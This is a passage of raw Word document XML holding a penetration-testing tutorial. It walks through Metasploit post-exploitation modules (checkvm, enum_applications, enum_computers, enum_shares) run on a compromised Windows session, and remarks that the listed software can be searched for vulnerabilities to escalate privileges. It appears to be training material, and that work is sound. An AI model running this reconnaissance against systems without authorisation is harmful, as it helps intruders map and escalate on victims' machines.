            <wp:docPr id="8009205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0597" name="Picture 800920597"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5708943" cy="3333921"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B7E4A0" w14:textId="1C9EDE3B" w:rsidR="003C4B6F" w:rsidRPr="00E52F12" w:rsidRDefault="003C4B6F" w:rsidP="00E52F12">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15C03EC6" wp14:editId="75A00E4A">
            <wp:extent cx="5753396" cy="4362674"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60663152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1522" name="Picture 3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53396" cy="4362674"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CC614D" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve">As shown in the preceding screenshot, this module will enumerate a list of currently and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>previous</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> logged on users as well as the respective SIDs of the user accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BD920D" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>We can also check if the target system is a virtual machine by leveraging a module called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>checkvm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>. This module will tell you whether the target system is a VM or container. Run the module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1498D6B7" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4671E3BA" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>use post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>checkvm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A3A27B8" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44128CD1" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B11900" w14:textId="4626E268" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="003C4B6F" w:rsidP="00E52F12">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CC8948F" wp14:editId="152EE150">
            <wp:extent cx="5670841" cy="4464279"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="19268323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2316" name="Picture 1926832316"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5670841" cy="4464279"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2318DE22" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>As shown in the preceding screenshot, the module tells us that the target system is a virtual machine running on the Xen hypervisor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0E7C9F" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>Another important module is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enum_applications</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t> module. This module enumerates a list of installed application/programs on the target system. Run the module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CF9111" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFD0096" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>use post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>enum_applications</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="780C31F0" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E4ADEA" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF0A8E0" w14:textId="10AA3F54" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="003C4B6F" w:rsidP="00E52F12">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E4C2738" wp14:editId="528A3E9B">
            <wp:extent cx="5740695" cy="4343623"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="862378115" name="Picture 3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78115" name="Picture 33" descr="A computer screen shot of a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40695" cy="4343623"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="648B5C0F" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve">As shown in the preceding screenshot, the module enumerates a list of installed applications. This information is very useful as it can be used to search for </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vulnerabilities in the installed programs</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> that can be leveraged or exploited to elevate your privileges or reveal important information. It also gives you an idea as to what this system is being used for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51579E9D" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>We can utilize the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enum_computers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> module to enumerate a list of </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>computers connected to the same LAN</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52F12">
        <w:t xml:space="preserve"> that the target is a part of. Try running the module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296CCDD8" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E21A505" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>use post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>enum_computers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7BC48A94" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0540D5" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9508F6" w14:textId="43032D1D" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="003C4B6F" w:rsidP="00E52F12">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BE67917" wp14:editId="0440EE15">
            <wp:extent cx="5734345" cy="4121362"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2759142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14219" name="Picture 275914219"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734345" cy="4121362"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7285C08C" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>As shown in the preceding screenshot, the module reveals that the target system is not part of a Windows domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1038AC61" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>We can also enumerate a list of shares by using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enum_shares</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t> module. Run the module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6939BFE8" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678409BC" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>use post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52F12">
        <w:t>enum_shares</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F76650F" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0FE2A5" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58768086" w14:textId="54F4D744" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="0031294A" w:rsidP="00E52F12">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FF32CCF" wp14:editId="7B28BB4E">
            <wp:extent cx="5753396" cy="4299171"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="266991027"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91027" name="Picture 35"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53396" cy="4299171"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="552D7171" w14:textId="77777777" w:rsidR="00E52F12" w:rsidRPr="00E52F12" w:rsidRDefault="00E52F12" w:rsidP="00E52F12">
      <w:r w:rsidRPr="00E52F12">
        <w:t>As shown in the preceding screenshot, the module only finds the print share.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C1D046" w14:textId="154C32D6" w:rsidR="00E52F12" w:rsidRDefault="00E52F12"/>
    <w:sectPr w:rsidR="00E52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B31"/>
    <w:rsid w:val="0031294A"/>
    <w:rsid w:val="003C4B6F"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00A872C9"/>
    <w:rsid w:val="00CE4B31"/>
    <w:rsid w:val="00E5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FF2C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A1A77574-DB2C-477D-AE64-F3BDDF95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B31"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00CE4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B31"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00CE4B31"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00CE4B31"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00CE4B31"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00CE4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B31"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00CE4B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image" Target="media/image14.tmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.tmp"/><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2025-10-09T10:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-09T10:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>